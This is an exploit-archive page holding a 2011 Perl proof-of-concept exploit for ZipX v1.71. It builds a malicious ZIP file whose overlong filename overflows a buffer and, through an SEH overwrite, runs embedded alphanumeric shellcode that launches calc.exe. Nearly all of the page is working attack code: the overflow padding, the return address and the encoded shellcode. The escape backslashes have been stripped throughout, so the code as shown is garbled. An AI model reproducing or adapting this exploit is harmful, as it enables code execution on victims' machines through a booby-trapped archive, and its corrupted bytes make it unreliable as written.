ZipX for Windows v1.71 ZIP File Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : ZipX for Windows v1.71 ZIP File Buffer Overflow Exploit
# Published : 2011-09-05
# Author :
# Previous Title : Free MP3 CD Ripper 1.1 DEP Bypass Exploit
# Next Title : GOM Player 2.1.33.5071 ASX File Unicode Stack Buffer Overflow Exploit

#!/usr/bin/perl
#
#[+]Exploit Title: ZipX for Windows v1.71 ZIP File Buffer Overflow Exploit
#[+]Date: 0592011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://download.cnet.com/ZipX/3000-2250_4-10518937.html
#[+]Version: v1.71
#[+]Tested On: WIN-XP SP3 Brazilian Portuguese
#[+]CVE: N/A
#
#
#Reproduce:
#Open the zip file, after click in "Encrypt", type you password and click in "Ok" BOOM!!! 
#See the calc.exe
#


use strict;
use warnings;

my $filename = "Exploit.zip"; 

print "nnttZipX for Windows v1.71 ZIP File Buffer Overflow Exploitn";
print "ttCreated by C4SS!0 G0M3Sn";
print "ttE-mail louredo_@hotmail.comn";
print "ttSite http://net-fuzzer.blogspot.com/nn";
sleep(1);

print "tt[+]Creating ZIP File...n";
sleep(1);
my $head = "x50x4Bx03x04x14x00x00".
"x00x00x00xB7xACxCEx34x00x00x00" .
"x00x00x00x00x00x00x00x00" .
"xe4x0f" .
"x00x00x00";

my $head2 = "x50x4Bx01x02x14x00x14".
"x00x00x00x00x00xB7xACxCEx34x00x00x00" .
"x00x00x00x00x00x00x00x00x00".
"xe4x0f".
"x00x00x00x00x00x00x01x00".
"x24x00x00x00x00x00x00x00";

my $head3 = "x50x4Bx05x06x00x00x00".
"x00x01x00x01x00".
"x12x10x00x00".
"x02x10x00x00".
"x00x00";

my $shellcode = 
"PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIHZXL9ID414ZTOKHI9LMUK" .
"VPZ6QO9X1P26QPZTW5S1JR7LCTKN8BGR3RWS9JNYLK79ZZ165U2KKLC5RZGNNUC70NEPB9OUTQMXPNMM" .
"PV261UKL71ME2NMP7FQY0NOHKPKZUDOZULDS8PQ02ZXM3TCZK47PQODJ8O52JNU0N72N28MZKLTNGU7Z" . # Shellcode WinExec "calc.exe"
"UXDDXZSOMKL4SQKUNKMJPOOCRODCMDKR0PGQD0EYIRVMHUZJDOGTUV2WP3OIVQ1QJSLSKGBLYKOY7NWW" . # Alpha Numeric Shellcode BaseAddress EAX
"LNG6LBOM5V6M0KF2NQDPMSL7XT80P61PBMTXYQDK5DMLYT231V649DZTPP26LWSQRLZLQK15XUXYUNP1" .
"BPF4X6PZIVOTZPJJRUOCC3KD9L034LDOXX5KKXNJQMOLSJ6BCORL9WXQNKPUWNKRKJ8JSNS4YMMOHT3Z" .
"QJOHQ4QJUQLN1VSLV5S1QYO0YA";
my $payload = "A" x 330;
$payload .= 
("x66x05x4DxCD" x 4).
"x66x05x19x18". # ADD AX,1819
"x54x5Ax50x5B". # PUSH ESP # POP EDX # PUSH EAX # POP EBX
"x2BxE0". # Afer convertion SUB EDX,EBX
"x52x58". # PUSH EDX # POP EAX
"x98xd1"; # CALL EAX
$payload .= "C" x (371-length($payload));
$payload .= "x3Cx01x75xd1"; # Converted is that "x3cx04x75xd0"
$payload .= pack('V',0x0041334d); # P/P/RET
$payload .= $shellcode;
$payload .= "B" x (4064-length($payload));
$payload = $payload.".rar";
my $zip = $head.$payload.$head2.$payload.$head3;
open(FILE,">$filename") || die "tt[-]Error:n$!n";
print FILE $zip;
close(FILE);
print "tt[+] ZIP File Created With Sucess:)n";
sleep(3);